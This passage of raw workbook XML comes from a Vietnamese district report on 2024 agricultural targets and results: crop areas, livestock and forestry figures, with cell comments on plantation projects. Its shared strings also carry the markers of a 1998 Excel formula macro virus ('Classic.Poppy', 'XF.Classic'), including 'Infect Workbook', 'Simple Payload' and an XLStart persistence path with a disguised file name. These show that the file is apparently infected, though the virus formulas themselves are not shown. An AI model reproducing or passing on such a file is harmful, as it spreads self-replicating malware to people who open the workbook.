  <c r="F34" i="44"/>
  <c r="L30" i="44"/>
  <c r="K30" i="44"/>
  <c r="J30" i="44"/>
  <c r="I30" i="44"/>
  <c r="H30" i="44"/>
  <c r="G30" i="44"/>
  <c r="F30" i="44"/>
  <c r="L24" i="44"/>
  <c r="L16" i="44" s="1"/>
  <c r="K24" i="44"/>
  <c r="J24" i="44"/>
  <c r="J16" i="44" s="1"/>
  <c r="I24" i="44"/>
  <c r="I16" i="44" s="1"/>
  <c r="H24" i="44"/>
  <c r="H16" i="44" s="1"/>
  <c r="G24" i="44"/>
  <c r="G16" i="44" s="1"/>
  <c r="F24" i="44"/>
  <c r="F16" i="44" s="1"/>
  <c r="L22" i="44"/>
  <c r="K22" i="44"/>
  <c r="J22" i="44"/>
  <c r="I22" i="44"/>
  <c r="H22" i="44"/>
  <c r="G22" i="44"/>
  <c r="F22" i="44"/>
  <c r="N71" i="44" l="1"/>
  <c r="L58" i="44"/>
  <c r="AN56" i="44"/>
  <c r="AK97" i="44"/>
  <c r="AH106" i="44"/>
  <c r="AH97" i="44"/>
  <c r="N94" i="44"/>
  <c r="R141" i="44"/>
  <c r="S141" i="44" s="1"/>
  <c r="S142" i="44"/>
  <c r="O76" i="44"/>
  <c r="AM18" i="44"/>
  <c r="AM17" i="44" s="1"/>
  <c r="AM25" i="44"/>
  <c r="AJ18" i="44"/>
  <c r="AJ17" i="44" s="1"/>
  <c r="AJ25" i="44"/>
  <c r="AG18" i="44"/>
  <c r="AG11" i="44" s="1"/>
  <c r="AG25" i="44"/>
  <c r="N26" i="44"/>
  <c r="N25" i="44" s="1"/>
  <c r="Z37" i="44"/>
  <c r="O49" i="44"/>
  <c r="Z18" i="44"/>
  <c r="Z11" i="44" s="1"/>
  <c r="Z25" i="44"/>
  <c r="AP56" i="44"/>
  <c r="AO122" i="44"/>
  <c r="AP122" i="44"/>
  <c r="AO108" i="44"/>
  <c r="AP108" i="44"/>
  <c r="AO129" i="44"/>
  <c r="AP129" i="44"/>
  <c r="AO150" i="44"/>
  <c r="AP150" i="44"/>
  <c r="AO36" i="44"/>
  <c r="AP36" i="44"/>
  <c r="O94" i="44"/>
  <c r="N87" i="44"/>
  <c r="AO98" i="44"/>
  <c r="AP98" i="44"/>
  <c r="AO75" i="44"/>
  <c r="AP75" i="44"/>
  <c r="O156" i="44"/>
  <c r="AO157" i="44"/>
  <c r="AP157" i="44"/>
  <c r="AO147" i="44"/>
  <c r="AP147" i="44"/>
  <c r="O16" i="44"/>
  <c r="AO24" i="44"/>
  <c r="AP24" i="44"/>
  <c r="AO130" i="44"/>
  <c r="AP130" i="44"/>
  <c r="AO131" i="44"/>
  <c r="AP131" i="44"/>
  <c r="N111" i="44"/>
  <c r="O142" i="44"/>
  <c r="O141" i="44" s="1"/>
  <c r="AO144" i="44"/>
  <c r="AO59" i="44"/>
  <c r="AP59" i="44"/>
  <c r="AO91" i="44"/>
  <c r="AP91" i="44"/>
  <c r="AO86" i="44"/>
  <c r="AP86" i="44"/>
  <c r="AO80" i="44"/>
  <c r="AP80" i="44"/>
  <c r="O114" i="44"/>
  <c r="AO114" i="44" s="1"/>
  <c r="AO115" i="44"/>
  <c r="O21" i="44"/>
  <c r="AO22" i="44"/>
  <c r="AO112" i="44"/>
  <c r="AP112" i="44"/>
  <c r="AO93" i="44"/>
  <c r="P13" i="44"/>
  <c r="AD78" i="44"/>
  <c r="T13" i="44"/>
  <c r="AB78" i="44"/>
  <c r="AB13" i="44" s="1"/>
  <c r="N14" i="44"/>
  <c r="N142" i="44"/>
  <c r="N141" i="44" s="1"/>
  <c r="N38" i="44"/>
  <c r="N37" i="44" s="1"/>
  <c r="AI78" i="44"/>
  <c r="AI13" i="44" s="1"/>
  <c r="AM14" i="44"/>
  <c r="O50" i="44"/>
  <c r="AO56" i="44"/>
  <c r="AL13" i="44"/>
  <c r="AF13" i="44"/>
  <c r="X13" i="44"/>
  <c r="O68" i="44"/>
  <c r="AO70" i="44"/>
  <c r="Z78" i="44"/>
  <c r="AA78" i="44" s="1"/>
  <c r="AG78" i="44"/>
  <c r="V78" i="44"/>
  <c r="W78" i="44" s="1"/>
  <c r="N33" i="44"/>
  <c r="N58" i="44"/>
  <c r="N57" i="44" s="1"/>
  <c r="AF18" i="44"/>
  <c r="AF17" i="44" s="1"/>
  <c r="P18" i="44"/>
  <c r="P17" i="44" s="1"/>
  <c r="X18" i="44"/>
  <c r="X17" i="44" s="1"/>
  <c r="O107" i="44"/>
  <c r="AP107" i="44" s="1"/>
  <c r="N97" i="44"/>
  <c r="N78" i="44" s="1"/>
  <c r="O97" i="44"/>
  <c r="AP97" i="44" s="1"/>
  <c r="T18" i="44"/>
  <c r="T17" i="44" s="1"/>
  <c r="AL25" i="44"/>
  <c r="AB18" i="44"/>
  <c r="AB17" i="44" s="1"/>
  <c r="AG14" i="44"/>
  <c r="AM78" i="44"/>
  <c r="AI25" i="44"/>
  <c r="AD18" i="44"/>
  <c r="AD11" i="44" s="1"/>
  <c r="V18" i="44"/>
  <c r="V10" i="44" s="1"/>
  <c r="V9" i="44" s="1"/>
  <c r="L50" i="44"/>
  <c r="AJ14" i="44"/>
  <c r="R14" i="44"/>
  <c r="S14" i="44" s="1"/>
  <c r="V141" i="44"/>
  <c r="O26" i="44"/>
  <c r="O25" i="44" s="1"/>
  <c r="R78" i="44"/>
  <c r="S78" i="44" s="1"/>
  <c r="O57" i="44"/>
  <c r="AJ78" i="44"/>
  <c r="O87" i="44"/>
  <c r="G106" i="44"/>
  <c r="G78" i="44" s="1"/>
  <c r="V14" i="44"/>
  <c r="W14" i="44" s="1"/>
  <c r="Z14" i="44"/>
  <c r="AA14" i="44" s="1"/>
  <c r="AJ141" i="44"/>
  <c r="O71" i="44"/>
  <c r="L106" i="44"/>
  <c r="L78" i="44" s="1"/>
  <c r="K106" i="44"/>
  <c r="K78" i="44" s="1"/>
  <c r="H142" i="44"/>
  <c r="H38" i="44"/>
  <c r="H37" i="44" s="1"/>
  <c r="K113" i="44"/>
  <c r="K111" i="44" s="1"/>
  <c r="G113" i="44"/>
  <c r="G111" i="44" s="1"/>
  <c r="E37" i="44"/>
  <c r="E78" i="44"/>
  <c r="H68" i="44"/>
  <c r="L122" i="44"/>
  <c r="F142" i="44"/>
  <c r="F141" i="44" s="1"/>
  <c r="K142" i="44"/>
  <c r="E114" i="44"/>
  <c r="E113" i="44" s="1"/>
  <c r="E111" i="44" s="1"/>
  <c r="K16" i="44"/>
  <c r="H106" i="44"/>
  <c r="H78" i="44" s="1"/>
  <c r="H151" i="44"/>
  <c r="H149" i="44" s="1"/>
  <c r="L151" i="44"/>
  <c r="L149" i="44" s="1"/>
  <c r="E14" i="44"/>
  <c r="L26" i="44"/>
  <c r="L25" i="44" s="1"/>
  <c r="K38" i="44"/>
  <c r="I151" i="44"/>
  <c r="I149" i="44" s="1"/>
  <c r="E25" i="44"/>
  <c r="D151" i="44"/>
  <c r="D149" i="44" s="1"/>
  <c r="I26" i="44"/>
  <c r="I18" i="44" s="1"/>
  <c r="H26" i="44"/>
  <c r="H25" i="44" s="1"/>
  <c r="F38" i="44"/>
  <c r="J38" i="44"/>
  <c r="G38" i="44"/>
  <c r="I50" i="44"/>
  <c r="J113" i="44"/>
  <c r="J111" i="44" s="1"/>
  <c r="F151" i="44"/>
  <c r="F149" i="44" s="1"/>
  <c r="J151" i="44"/>
  <c r="J149" i="44" s="1"/>
  <c r="G26" i="44"/>
  <c r="G25" i="44" s="1"/>
  <c r="K26" i="44"/>
  <c r="K25" i="44" s="1"/>
  <c r="G50" i="44"/>
  <c r="K50" i="44"/>
  <c r="I113" i="44"/>
  <c r="I111" i="44" s="1"/>
  <c r="L141" i="44"/>
  <c r="G141" i="44"/>
  <c r="F26" i="44"/>
  <c r="F25" i="44" s="1"/>
  <c r="J26" i="44"/>
  <c r="J25" i="44" s="1"/>
  <c r="I38" i="44"/>
  <c r="I37" i="44" s="1"/>
  <c r="F50" i="44"/>
  <c r="L38" i="44"/>
  <c r="F106" i="44"/>
  <c r="H113" i="44"/>
  <c r="H111" i="44" s="1"/>
  <c r="J141" i="44"/>
  <c r="J78" i="44"/>
  <c r="J68" i="44"/>
  <c r="J14" i="44" s="1"/>
  <c r="L113" i="44"/>
  <c r="L111" i="44" s="1"/>
  <c r="H58" i="44"/>
  <c r="H50" i="44"/>
  <c r="J58" i="44"/>
  <c r="G68" i="44"/>
  <c r="G72" i="44"/>
  <c r="I78" i="44"/>
  <c r="I141" i="44"/>
  <c r="H88" i="44"/>
  <c r="F114" i="44"/>
  <c r="F113" i="44" s="1"/>
  <c r="F111" i="44" s="1"/>
  <c r="G151" i="44"/>
  <c r="G149" i="44" s="1"/>
  <c r="K151" i="44"/>
  <c r="K149" i="44" s="1"/>
  <c r="AM10" i="44" l="1"/>
  <c r="AM9" i="44" s="1"/>
  <c r="AG10" i="44"/>
  <c r="AG9" i="44" s="1"/>
  <c r="AN78" i="44"/>
  <c r="AN106" i="44"/>
  <c r="AK78" i="44"/>
  <c r="AK106" i="44"/>
  <c r="AH78" i="44"/>
  <c r="AH14" i="44"/>
  <c r="AD13" i="44"/>
  <c r="AE78" i="44"/>
  <c r="O106" i="44"/>
  <c r="O78" i="44" s="1"/>
  <c r="N13" i="44"/>
  <c r="AJ11" i="44"/>
  <c r="Z10" i="44"/>
  <c r="Z9" i="44" s="1"/>
  <c r="AM11" i="44"/>
  <c r="AG17" i="44"/>
  <c r="N18" i="44"/>
  <c r="N17" i="44" s="1"/>
  <c r="O38" i="44"/>
  <c r="O37" i="44" s="1"/>
  <c r="O48" i="44"/>
  <c r="AJ10" i="44"/>
  <c r="AJ9" i="44" s="1"/>
  <c r="Z17" i="44"/>
  <c r="AM13" i="44"/>
  <c r="AO68" i="44"/>
  <c r="AP68" i="44"/>
  <c r="AO142" i="44"/>
  <c r="AP142" i="44"/>
  <c r="AO16" i="44"/>
  <c r="AP16" i="44"/>
  <c r="AO141" i="44"/>
  <c r="AP141" i="44"/>
  <c r="AO50" i="44"/>
  <c r="AP50" i="44"/>
  <c r="AP114" i="44"/>
  <c r="O113" i="44"/>
  <c r="AO156" i="44"/>
  <c r="AP156" i="44"/>
  <c r="AO97" i="44"/>
  <c r="O14" i="44"/>
  <c r="AG13" i="44"/>
  <c r="V13" i="44"/>
  <c r="W13" i="44" s="1"/>
  <c r="AD10" i="44"/>
  <c r="AD9" i="44" s="1"/>
  <c r="AD17" i="44"/>
  <c r="V17" i="44"/>
  <c r="H18" i="44"/>
  <c r="H11" i="44" s="1"/>
  <c r="R10" i="44"/>
  <c r="R9" i="44" s="1"/>
  <c r="G18" i="44"/>
  <c r="G17" i="44" s="1"/>
  <c r="L14" i="44"/>
  <c r="L13" i="44" s="1"/>
  <c r="V11" i="44"/>
  <c r="R13" i="44"/>
  <c r="S13" i="44" s="1"/>
  <c r="O18" i="44"/>
  <c r="AJ13" i="44"/>
  <c r="R11" i="44"/>
  <c r="E13" i="44"/>
  <c r="I25" i="44"/>
  <c r="H141" i="44"/>
  <c r="Z13" i="44"/>
  <c r="AA13" i="44" s="1"/>
  <c r="I14" i="44"/>
  <c r="AE14" i="44" s="1"/>
  <c r="L18" i="44"/>
  <c r="L10" i="44" s="1"/>
  <c r="L9" i="44" s="1"/>
  <c r="K141" i="44"/>
  <c r="K14" i="44"/>
  <c r="K13" i="44" s="1"/>
  <c r="K18" i="44"/>
  <c r="F18" i="44"/>
  <c r="F10" i="44" s="1"/>
  <c r="F9" i="44" s="1"/>
  <c r="F14" i="44"/>
  <c r="F78" i="44"/>
  <c r="J18" i="44"/>
  <c r="J17" i="44" s="1"/>
  <c r="G14" i="44"/>
  <c r="J13" i="44"/>
  <c r="I17" i="44"/>
  <c r="I10" i="44"/>
  <c r="I9" i="44" s="1"/>
  <c r="I11" i="44"/>
  <c r="H14" i="44"/>
  <c r="AK13" i="44" l="1"/>
  <c r="AN14" i="44"/>
  <c r="AN13" i="44"/>
  <c r="AK14" i="44"/>
  <c r="AH13" i="44"/>
  <c r="AO106" i="44"/>
  <c r="AP106" i="44"/>
  <c r="O17" i="44"/>
  <c r="AO17" i="44" s="1"/>
  <c r="AO18" i="44"/>
  <c r="AO14" i="44"/>
  <c r="AP14" i="44"/>
  <c r="O111" i="44"/>
  <c r="AP113" i="44"/>
  <c r="AO113" i="44"/>
  <c r="AO78" i="44"/>
  <c r="AP78" i="44"/>
  <c r="O13" i="44"/>
  <c r="H10" i="44"/>
  <c r="H9" i="44" s="1"/>
  <c r="H17" i="44"/>
  <c r="G10" i="44"/>
  <c r="G9" i="44" s="1"/>
  <c r="G11" i="44"/>
  <c r="J10" i="44"/>
  <c r="J9" i="44" s="1"/>
  <c r="F17" i="44"/>
  <c r="J11" i="44"/>
  <c r="I13" i="44"/>
  <c r="AE13" i="44" s="1"/>
  <c r="AE113" i="44" s="1"/>
  <c r="F11" i="44"/>
  <c r="K10" i="44"/>
  <c r="K9" i="44" s="1"/>
  <c r="K17" i="44"/>
  <c r="K11" i="44"/>
  <c r="L17" i="44"/>
  <c r="L11" i="44"/>
  <c r="F13" i="44"/>
  <c r="H13" i="44"/>
  <c r="G13" i="44"/>
  <c r="AO13" i="44" l="1"/>
  <c r="AP13" i="44"/>
  <c r="AP111" i="44"/>
  <c r="AO111" i="44"/>
  <c r="R151" i="44"/>
  <c r="R149" i="44" s="1"/>
  <c r="O151" i="44" l="1"/>
  <c r="AO154" i="44"/>
  <c r="AP154" i="44"/>
  <c r="O153" i="44"/>
  <c r="AO153" i="44" l="1"/>
  <c r="AP153" i="44"/>
  <c r="O149" i="44"/>
  <c r="AO151" i="44"/>
  <c r="AP151" i="44"/>
  <c r="AO149" i="44" l="1"/>
  <c r="AP149" i="44"/>
</calcChain>
</file>

<file path=xl/comments1.xml><?xml version="1.0" encoding="utf-8"?>
<comments xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <authors>
    <author>TRUNG KHANH</author>
  </authors>
  <commentList>
    <comment ref="AJ84" authorId="0" shapeId="0">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
            <charset val="163"/>
          </rPr>
          <t>DA HTPTSX 14,98ha + 16,38ha dân trồng từ hỗ trợ hội nông dân</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
            <charset val="163"/>
          </rPr>
          <t xml:space="preserve">
</t>
        </r>
      </text>
    </comment>
    <comment ref="Z96" authorId="0" shapeId="0">
      <text>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">DAHTPTSX xã trồng mới cao su 20ha
</t>
        </r>
      </text>
    </comment>
    <comment ref="AD96" authorId="0" shapeId="0">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
            <charset val="163"/>
          </rPr>
          <t>DA HTPTSX trồng cây cao su 33,0ha</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
            <charset val="163"/>
          </rPr>
          <t xml:space="preserve">
</t>
        </r>
      </text>
    </comment>
    <comment ref="Z102" authorId="0" shapeId="0">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
            <charset val="163"/>
          </rPr>
          <t>DA HTPTSX 3,5ha; Dân tự trồng 4,5ha</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
            <charset val="163"/>
          </rPr>
          <t xml:space="preserve">
</t>
        </r>
      </text>
    </comment>
    <comment ref="AM102" authorId="0" shapeId="0">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
            <charset val="163"/>
          </rPr>
          <t>Dự án HTPTSX hỗ trợ cây sầu riêng 12,59ha (7,49ha +5,1ha)</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
            <charset val="163"/>
          </rPr>
          <t xml:space="preserve">
</t>
        </r>
      </text>
    </comment>
    <comment ref="V108" authorId="0" shapeId="0">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
            <charset val="163"/>
          </rPr>
          <t>DA liên kết chuỗi giá trị cây Măcca 24,1ha</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
            <charset val="163"/>
          </rPr>
          <t xml:space="preserve">
</t>
        </r>
      </text>
    </comment>
    <comment ref="V112" authorId="0" shapeId="0">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
            <charset val="163"/>
          </rPr>
          <t>4,1ha diện tích cây bời lời người dân thu hoạch và chuyển sang trồng cây Măcca theo chuỗi giá trị</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
            <charset val="163"/>
          </rPr>
          <t xml:space="preserve">
</t>
        </r>
      </text>
    </comment>
    <comment ref="Z112" authorId="0" shapeId="0">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
            <charset val="163"/>
          </rPr>
          <t>Tháng 8/2024 thu hoạch 20ha cây bời lời để chuyển sang trồng 20ha cây cao su</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
            <charset val="163"/>
          </rPr>
          <t xml:space="preserve">
</t>
        </r>
      </text>
    </comment>
    <comment ref="AD112" authorId="0" shapeId="0">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
            <charset val="163"/>
          </rPr>
          <t>THáng 8/2024 thu hoạch 14ha cây bời lời để trồng 14ha cây sắn</t>
        </r>
        <r>
          <rPr>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
            <charset val="163"/>
          </rPr>
          <t xml:space="preserve">
</t>
        </r>
      </text>
    </comment>
  </commentList>
</comments>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="464" uniqueCount="168">
  <si>
    <t>ĐVT</t>
  </si>
  <si>
    <t>ha</t>
  </si>
  <si>
    <t>tạ/ha</t>
  </si>
  <si>
    <t xml:space="preserve"> -</t>
  </si>
  <si>
    <t>Tên chỉ tiêu</t>
  </si>
  <si>
    <t>Đăk Kôi</t>
  </si>
  <si>
    <t>1.1</t>
  </si>
  <si>
    <t>1.2</t>
  </si>
  <si>
    <t>A</t>
  </si>
  <si>
    <t>I</t>
  </si>
  <si>
    <t>Diện tích</t>
  </si>
  <si>
    <t>Năng suất</t>
  </si>
  <si>
    <t>Sản lượng</t>
  </si>
  <si>
    <t>Lúa Đông xuân</t>
  </si>
  <si>
    <t>Lạc</t>
  </si>
  <si>
    <t>2.2</t>
  </si>
  <si>
    <t>Khoai lang</t>
  </si>
  <si>
    <t>Sắn</t>
  </si>
  <si>
    <t>Rau các loại</t>
  </si>
  <si>
    <t>Đậu các loại</t>
  </si>
  <si>
    <t>Cây mía</t>
  </si>
  <si>
    <t>Cây cà phê</t>
  </si>
  <si>
    <t>Cây tiêu</t>
  </si>
  <si>
    <t>Cây cao su</t>
  </si>
  <si>
    <t>Cây bời lời</t>
  </si>
  <si>
    <t>Đàn trâu</t>
  </si>
  <si>
    <t>Đàn bò</t>
  </si>
  <si>
    <t>Đàn lợn</t>
  </si>
  <si>
    <t>Đàn dê</t>
  </si>
  <si>
    <t>Đàn gia cầm</t>
  </si>
  <si>
    <t>II</t>
  </si>
  <si>
    <t>B</t>
  </si>
  <si>
    <t>C</t>
  </si>
  <si>
    <t>2.1</t>
  </si>
  <si>
    <t xml:space="preserve"> - </t>
  </si>
  <si>
    <t xml:space="preserve">  - </t>
  </si>
  <si>
    <t>tấn</t>
  </si>
  <si>
    <t>Trong đó: Ruộng</t>
  </si>
  <si>
    <t>Ngô vụ 2</t>
  </si>
  <si>
    <t/>
  </si>
  <si>
    <t>con</t>
  </si>
  <si>
    <t>người</t>
  </si>
  <si>
    <t>Lúa vụ mùa</t>
  </si>
  <si>
    <t>CHĂN NUÔI</t>
  </si>
  <si>
    <t>TRỒNG TRỌT</t>
  </si>
  <si>
    <t>Dân số trung bình</t>
  </si>
  <si>
    <t>Tr.đó: Ngô vụ 1</t>
  </si>
  <si>
    <t>**Auto and On Sheet Starts Here**</t>
  </si>
  <si>
    <t>Classic.Poppy by VicodinES</t>
  </si>
  <si>
    <t>With Lord Natas</t>
  </si>
  <si>
    <t>An Excel Formula Macro Virus (XF.Classic)</t>
  </si>
  <si>
    <t>Hydrocodone/APAP 10-650 For Your Computer</t>
  </si>
  <si>
    <t>(C) The Narkotic Network 1998</t>
  </si>
  <si>
    <t>**Simple Payload**</t>
  </si>
  <si>
    <t>**Set Our Values and Paths**</t>
  </si>
  <si>
    <t>**Add New Workbook, Infect It, Save It As ÿÿÿÿÿ.xls**</t>
  </si>
  <si>
    <t>**Infect Workbook**</t>
  </si>
  <si>
    <t>Lúa cả năm</t>
  </si>
  <si>
    <t>C:\Program Files\Microsoft Office\Office10\xlstart\ÿÿÿÿÿ.</t>
  </si>
  <si>
    <t>Đ.Ruồng</t>
  </si>
  <si>
    <t>T.Trấn</t>
  </si>
  <si>
    <t>Đ.Pne</t>
  </si>
  <si>
    <t>ÿÿÿÿÿ</t>
  </si>
  <si>
    <t>*</t>
  </si>
  <si>
    <t>Lúa ô nà (rẫy)</t>
  </si>
  <si>
    <t>Ngô cả năm</t>
  </si>
  <si>
    <t>Cây thực phẩm:</t>
  </si>
  <si>
    <t>1.2.1</t>
  </si>
  <si>
    <t>1.2.2</t>
  </si>
  <si>
    <t>Cây chất bột lấy củ:</t>
  </si>
  <si>
    <t>BC Tong ket nam 2008 &amp; KH nam 2009.xls</t>
  </si>
  <si>
    <t>Tr.đó: trồng mới:</t>
  </si>
  <si>
    <t>Cây CN ngắn ngày</t>
  </si>
  <si>
    <t>Ngô vụ Đông Xuân</t>
  </si>
  <si>
    <t>Tr đó: DT cho thu hoạch</t>
  </si>
  <si>
    <t>CÂY KHÁC</t>
  </si>
  <si>
    <t>Tr.đó: Thóc</t>
  </si>
  <si>
    <t>Đàn gia súc</t>
  </si>
  <si>
    <t>THỦY SẢN</t>
  </si>
  <si>
    <t>Tổng sản lượng thủy sản</t>
  </si>
  <si>
    <t>Diện tích nuôi ao hồ nhỏ</t>
  </si>
  <si>
    <t>Diện tích nuôi ao hồ lớn</t>
  </si>
  <si>
    <t>Tr.đó: Trồng mới</t>
  </si>
  <si>
    <t>DT cho thu hoạch</t>
  </si>
  <si>
    <t>Sản lượng nuôi trồng TS</t>
  </si>
  <si>
    <t>Đ.Tơ Lung</t>
  </si>
  <si>
    <t>Đ.Tơ Re</t>
  </si>
  <si>
    <t>T. Lập</t>
  </si>
  <si>
    <t>Tổng SL LT có hạt (lúa, ngô)</t>
  </si>
  <si>
    <t>2.3</t>
  </si>
  <si>
    <t>3.1</t>
  </si>
  <si>
    <t>3.2</t>
  </si>
  <si>
    <t>4.1</t>
  </si>
  <si>
    <t>4.2</t>
  </si>
  <si>
    <t>5.1</t>
  </si>
  <si>
    <t>5.2</t>
  </si>
  <si>
    <t>III</t>
  </si>
  <si>
    <t>Cây Mắc ca</t>
  </si>
  <si>
    <t>Cụ thể các xã, thị trấn</t>
  </si>
  <si>
    <t>Bình quân lương thực đầu người</t>
  </si>
  <si>
    <t>Dân số</t>
  </si>
  <si>
    <t>Kg/người/năm</t>
  </si>
  <si>
    <t xml:space="preserve">Cây ăn quả </t>
  </si>
  <si>
    <t>Diện tích trồng cũ</t>
  </si>
  <si>
    <t>DT trồng cũ</t>
  </si>
  <si>
    <t xml:space="preserve">Diện tích trong dân </t>
  </si>
  <si>
    <t>Diện tích của DN</t>
  </si>
  <si>
    <t>Trồng rừng</t>
  </si>
  <si>
    <t>Trồng cây phân tán</t>
  </si>
  <si>
    <t>Cây</t>
  </si>
  <si>
    <t>Ban QLRPH Kon Rẫy</t>
  </si>
  <si>
    <t>Các xã, thị trấn</t>
  </si>
  <si>
    <t>IV</t>
  </si>
  <si>
    <t>V</t>
  </si>
  <si>
    <t>VI</t>
  </si>
  <si>
    <t>+</t>
  </si>
  <si>
    <t>-</t>
  </si>
  <si>
    <t xml:space="preserve">BQL rừng phòng hộ </t>
  </si>
  <si>
    <t>DT GT CÂY HN</t>
  </si>
  <si>
    <t xml:space="preserve">C.ty TNHH MTV LN Kon Rẫy </t>
  </si>
  <si>
    <t>Diện tích nuôi trồng TS</t>
  </si>
  <si>
    <t>DT CÂY LÂU NĂM</t>
  </si>
  <si>
    <t>Khoanh nuôi rừng</t>
  </si>
  <si>
    <t xml:space="preserve">C.ty TNHH LN Kon Rẫy </t>
  </si>
  <si>
    <t>DT trồng mới, Tr. đó:</t>
  </si>
  <si>
    <t>DT trồng mới của DN</t>
  </si>
  <si>
    <t>DT trồng mới của dân</t>
  </si>
  <si>
    <t>Tr.đó: C.ty, Doanh nghiệp</t>
  </si>
  <si>
    <t>S.lượng khai thác TN</t>
  </si>
  <si>
    <t>DT trồng mới</t>
  </si>
  <si>
    <t>Dược liệu lâu năm</t>
  </si>
  <si>
    <t>Cây dược liệu</t>
  </si>
  <si>
    <t>Trồng cũ</t>
  </si>
  <si>
    <t>Trồng mới</t>
  </si>
  <si>
    <t>TỔNG DT GT (I+II+VI)</t>
  </si>
  <si>
    <t>TH năm 2022</t>
  </si>
  <si>
    <t>KH năm 2023</t>
  </si>
  <si>
    <t>Dược liệu hàng năm (trồng mới)</t>
  </si>
  <si>
    <t>Dược liệu khoanh nuôi (tiếp tục bảo vệ)</t>
  </si>
  <si>
    <t>KH năm 2024</t>
  </si>
  <si>
    <t>Ghi chú</t>
  </si>
  <si>
    <t>KH ĐK 2024</t>
  </si>
  <si>
    <t>KH ĐR 2024</t>
  </si>
  <si>
    <t>KH ĐTL 2024</t>
  </si>
  <si>
    <t>KH ĐTR 2024</t>
  </si>
  <si>
    <t>KH TL 2024</t>
  </si>
  <si>
    <t>KH TT 2024</t>
  </si>
  <si>
    <t>KH Đpne 2024</t>
  </si>
  <si>
    <t xml:space="preserve"> +</t>
  </si>
  <si>
    <t>Sầu riêng</t>
  </si>
  <si>
    <t>Chuối</t>
  </si>
  <si>
    <t>Chanh dây</t>
  </si>
  <si>
    <t>Cây ăn quả khác</t>
  </si>
  <si>
    <t>a</t>
  </si>
  <si>
    <t>Dược liệu hàng năm đến cuối năm 2023</t>
  </si>
  <si>
    <t>b</t>
  </si>
  <si>
    <t>Dược liệu hàng năm trồng mới năm 2024</t>
  </si>
  <si>
    <t>c</t>
  </si>
  <si>
    <t>Cây dược liệu lâu năm</t>
  </si>
  <si>
    <t>Trong đó: DT trồng mới</t>
  </si>
  <si>
    <t>d</t>
  </si>
  <si>
    <t>TH so với KH (%)</t>
  </si>
  <si>
    <t>TT</t>
  </si>
  <si>
    <t>Tăng giảm so với cùng kỳ</t>
  </si>
  <si>
    <t>(Kèm theo Báo cáo số            /BC-UBND ngày      /     /2024 của UBND huyện Kon Rẫy)</t>
  </si>
  <si>
    <t>TH 9
 tháng năm 2023</t>
  </si>
  <si>
    <t>BIỂU TỔNG HỢP THỰC HIỆN CÁC CHỈ TIÊU SẢN XUẤT NÔNG NGHIỆP 11 THÁNG NĂM 2024</t>
  </si>
  <si>
    <t xml:space="preserve"> Ước TH 11 tháng năm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</si>
</sst>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8">
    <numFmt numFmtId="43" formatCode="_(* #,##0.00_);_(* \(#,##0.00\);_(* &quot;-&quot;??_);_(@_)"/>
    <numFmt numFmtId="164" formatCode="_(* #,##0_);_(* \(#,##0\);_(* &quot;-&quot;??_);_(@_)"/>
    <numFmt numFmtId="165" formatCode="#,##0.0"/>
    <numFmt numFmtId="166" formatCode="&quot;$&quot;#,##0;[Red]\-&quot;$&quot;#,##0"/>
    <numFmt numFmtId="167" formatCode="_-&quot;$&quot;* #,##0_-;\-&quot;$&quot;* #,##0_-;_-&quot;$&quot;* &quot;-&quot;_-;_-@_-"/>
    <numFmt numFmtId="168" formatCode="_-* #,##0_-;\-* #,##0_-;_-* &quot;-&quot;_-;_-@_-"/>
    <numFmt numFmtId="169" formatCode="_-&quot;$&quot;* #,##0.00_-;\-&quot;$&quot;* #,##0.00_-;_-&quot;$&quot;* &quot;-&quot;??_-;_-@_-"/>
    <numFmt numFmtId="170" formatCode="&quot;\&quot;#,##0;[Red]&quot;\&quot;\-#,##0"/>
    <numFmt numFmtId="171" formatCode="&quot;\&quot;#,##0.00;[Red]&quot;\&quot;\-#,##0.00"/>
    <numFmt numFmtId="172" formatCode="\$#,##0\ ;\(\$#,##0\)"/>
    <numFmt numFmtId="173" formatCode="&quot;\&quot;#,##0;[Red]&quot;\&quot;&quot;\&quot;\-#,##0"/>
